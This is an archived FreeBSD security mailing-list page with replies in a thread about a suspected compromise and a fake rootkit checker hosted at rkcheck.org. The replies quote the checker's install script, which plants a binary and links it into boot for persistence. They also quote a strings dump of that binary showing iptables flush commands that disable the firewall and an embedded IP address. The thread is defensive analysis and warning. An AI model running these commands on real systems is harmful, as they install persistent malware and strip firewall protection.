Skip site navigation (1)Skip section navigation (2)
Date:      Fri, 27 Feb 2015 02:40:05 +1100 (EST)
From:      Ian Smith <smithi@nimnet.asn.au>
To:        Christopher Schulte <christopher@schulte.org>
Cc:        Joseph Mingrone <jrm@ftfl.ca>, "freebsd-security@freebsd.org" <freebsd-security@freebsd.org>, Philip Jocks <pjlists@netzkommune.com>
Subject:   Re: has my 10.1-RELEASE system been compromised
Message-ID:  <20150227022821.P38620@sola.nimnet.asn.au>
In-Reply-To: <30A97E9B-5719-4DA3-ADFB-24A3FADF6D3C@schulte.org>
References:  <864mq9zsmm.fsf@gly.ftfl.ca> <54EE2A19.7050108@FreeBSD.org> <86vbipycyc.fsf@gly.ftfl.ca> <1B20A559-59C5-477A-A2F3-9FD7E16C09E8@netzkommune.com> <86k2z5yc03.fsf@gly.ftfl.ca> <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com> <30A97E9B-5719-4DA3-ADFB-24A3FADF6D3C@schulte.org>

next in thread | previous in thread | raw e-mail | index | archive | help
On Wed, 25 Feb 2015 20:55:43 +0000, Christopher Schulte wrote:
 > > On Feb 25, 2015, at 2:34 PM, Philip Jocks <pjlists@netzkommune.com> wrote:
 > > 
 > > it felt pretty scammy to me, googling for the "worm" got me to 
 > rkcheck.org which was registered a few days ago and looks like a 
 > tampered version of chkrootkit. I hope, nobody installed it anywhere, 
 > it seems to execute rkcheck/tests/.unit/test.sh which contains
 > > 
 > > #!/bin/bash
 > > 
 > > cp tests/.unit/test /usr/bin/rrsyncn
 > > chmod +x /usr/bin/rrsyncn
 > > rm -fr /etc/rc2.d/S98rsyncn
 > > ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn
 > > /usr/bin/rrsyncn
 > > exit
 > > 
 > > That doesn't look like something you'd want on your boxÿÿ
 > 
 > I filed a report with Google about that domain (Google Safe 
 > Browsing), briefly describing whatÿÿs been recounted here on this 
 > thread.  It seems quite suspicious, agreed.
 > 
 > Has anyone started an analysis of the rrsyncn binary?  The last few 
 > lines of a simple string dump are interestingÿÿ take note what looks 
 > to be an IP address of 95.215.44.195.
 > 
 > /bin/sh
 > iptables -X 2> /dev/null
 > iptables -F 2> /dev/null
 > iptables -t nat -F 2> /dev/null
 > iptables -t nat -X 2> /dev/null
 > iptables -t mangle -F 2> /dev/null
 > iptables -t mangle -X 2> /dev/null
 > iptables -P INPUT ACCEPT 2> /dev/null
 > iptables -P FORWARD ACCEPT 2> /dev/null
 > iptables -P OUTPUT ACCEPT 2> /dev/null
 > udevd
 > 95.215.44.195
 > ;*3$"
 > 
 > > Cheers,
 > > 
 > > Philip
 > 
 > Chris

Seeing as noone's mentioned it yet .. if your (linux) box were running 
iptables - a reasonable assumption - then running those commands would 
remove and flush all your rules, leaving you with a firewall that 
accepted everything, as good as no firewall at all.  And then .. ?

At least FreeBSD isn't the lowest hanging fruit for these monkeys ..

cheers, Ian
From owner-freebsd-security@FreeBSD.ORG  Thu Feb 26 18:02:59 2015
Return-Path: <owner-freebsd-security@FreeBSD.ORG>
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.freebsd.org (mx1.freebsd.org [8.8.178.115])
 (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits))
 (No client certificate requested)
 by hub.freebsd.org (Postfix) with ESMTPS id E7D18F6F
 for <freebsd-security@freebsd.org>; Thu, 26 Feb 2015 18:02:59 +0000 (UTC)
Received: from out1-smtp.messagingengine.com (out1-smtp.messagingengine.com
 [66.111.4.25])
 (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits))
 (Client did not present a certificate)
 by mx1.freebsd.org (Postfix) with ESMTPS id B7A61CAE
 for <freebsd-security@freebsd.org>; Thu, 26 Feb 2015 18:02:59 +0000 (UTC)
Received: from compute5.internal (compute5.nyi.internal [10.202.2.45])
 by mailout.nyi.internal (Postfix) with ESMTP id 8FC0121795
 for <freebsd-security@freebsd.org>; Thu, 26 Feb 2015 13:02:51 -0500 (EST)
Received: from web3 ([10.202.2.213])
 by compute5.internal (MEProxy); Thu, 26 Feb 2015 13:02:52 -0500
DKIM-Signature: v=1; a=rsa-sha1; c=relaxed/relaxed; d=
 messagingengine.com; h=message-id:x-sasl-enc:from:to
 :mime-version:content-transfer-encoding:content-type:in-reply-to
 :references:subject:date; s=smtpout; bh=2gzxv/mJeMzPZtuOIVkm4evr
 J/o=; b=Tzq6zQnJ5Ay1wW3g2OjfxtzQIXI6s9kJzRSnuX78Ks0Dh6+o7itI2AJD
 bO7tcZMDoLVcgibizSLs0ZvJs0EClMNqBfjAAztdIaTU/PNWpsfoNrxX7nsTjd+x
 X4728HvLtvDQkb3yfnU7oCkIQIody0xD1JAKE9J4SPhoLeweu3c=
Received: by web3.nyi.internal (Postfix, from userid 99)
 id 3A73511676F; Thu, 26 Feb 2015 13:02:52 -0500 (EST)
Message-Id: <1424973772.4085078.232885457.0277C7ED@webmail.messagingengine.com>
X-Sasl-Enc: qJJs6PCrJ4dw5ww0iYcYocqzhOfAJXZo+ObfpP+N7dHF 1424973772
From: Mark Felder <feld@FreeBSD.org>
To: freebsd-security@freebsd.org
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain; charset="utf-8"
X-Mailer: MessagingEngine.com Webmail Interface - ajax-4ba7306c
In-Reply-To: <32202C62-3CED-49B6-8259-0B18C52159D1@spam.lifeforms.nl>
References: <864mq9zsmm.fsf@gly.ftfl.ca>
 <32202C62-3CED-49B6-8259-0B18C52159D1@spam.lifeforms.nl>
Subject: Re: has my 10.1-RELEASE system been compromised
Date: Thu, 26 Feb 2015 12:02:52 -0600
X-BeenThere: freebsd-security@freebsd.org
X-Mailman-Version: 2.1.18-1
Precedence: list
List-Id: "Security issues \[members-only posting\]"
 <freebsd-security.freebsd.org>
List-Unsubscribe: <http://lists.freebsd.org/mailman/options/freebsd-security>, 
 <mailto:freebsd-security-request@freebsd.org?subject=unsubscribe>
List-Archive: <http://lists.freebsd.org/pipermail/freebsd-security/>;
List-Post: <mailto:freebsd-security@freebsd.org>
List-Help: <mailto:freebsd-security-request@freebsd.org?subject=help>
List-Subscribe: <http://lists.freebsd.org/mailman/listinfo/freebsd-security>, 
 <mailto:freebsd-security-request@freebsd.org?subject=subscribe>
X-List-Received-Date: Thu, 26 Feb 2015 18:03:00 -0000



On Wed, Feb 25, 2015, at 14:19, Walter Hop wrote:
>=20
> Example:
> # touch -t 201501010000 foo
> # find / -user www -newer foo
>=20
> If you don=E2=80=99t find anything, look back a little further.
> Hopefully you will find a clue in this way.
>=20

Thanks for posting this trick -- I've never considered it before and
will certainly put it in my toolbox!



Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20150227022821.P38620>